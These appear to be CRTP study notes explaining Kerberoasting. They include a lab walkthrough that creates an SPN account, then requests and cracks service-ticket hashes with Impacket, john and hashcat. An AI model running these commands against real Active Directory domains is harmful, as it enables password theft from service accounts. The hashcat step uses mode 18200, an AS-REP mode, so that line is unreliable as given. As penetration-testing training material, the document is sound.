Visit official github page
Certified Red Team Professional (CRTP) - Notes

7.3 - Kerberoasting

Kerberoasting

Kerberoasting targets service accounts with an assigned SPN. When a user requests access to a service, they receive a Service Ticket (ST) encrypted with the service account’s long-term password.

If an attacker can obtain the ST, they can attempt to crack the encryption offline to retrieve the service account password.

Kerberos Ticket Exchange for Services

3) TGS-REQ (Client -> KDC/TGS)
   - TGT 🔑 Encrypted with KDC key
   - Authenticator Data 🔑 Encrypted with TGS Session Key

4) TGS-REP (KDC/TGS -> Client)
   - ST 🔑 Encrypted with Service key
   - Service Session Key 🔑 Encrypted with TGS Session Key

Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.

Example: Exploiting Kerberoasting

Step 1: Create a User with an SPN

New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true

Step 2: Assign an SPN

Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"}

Step 3: Verify the SPN

Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames
setspn -L kerberoasting

Step 4: Identify Kerberoastable Accounts

#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Check kerberoastable users using the Impacket's module: GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc

in this case there're two vulnerable users: 'kerberoasting' and 'angel'.

Step 5: Request Service Tickets for Kerberoasting

GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt

Step 6: Crack the Service Ticket

john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt

Troubleshooting: Clock Skew Errors

If you encounter KRB_AP_ERR_SKEW (Clock skew too great), synchronize the clocks with:

sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc

Other Resources

Previous7.2 - AS-REP RoastingNext7.4 - User Enum in Kerberos

Last updated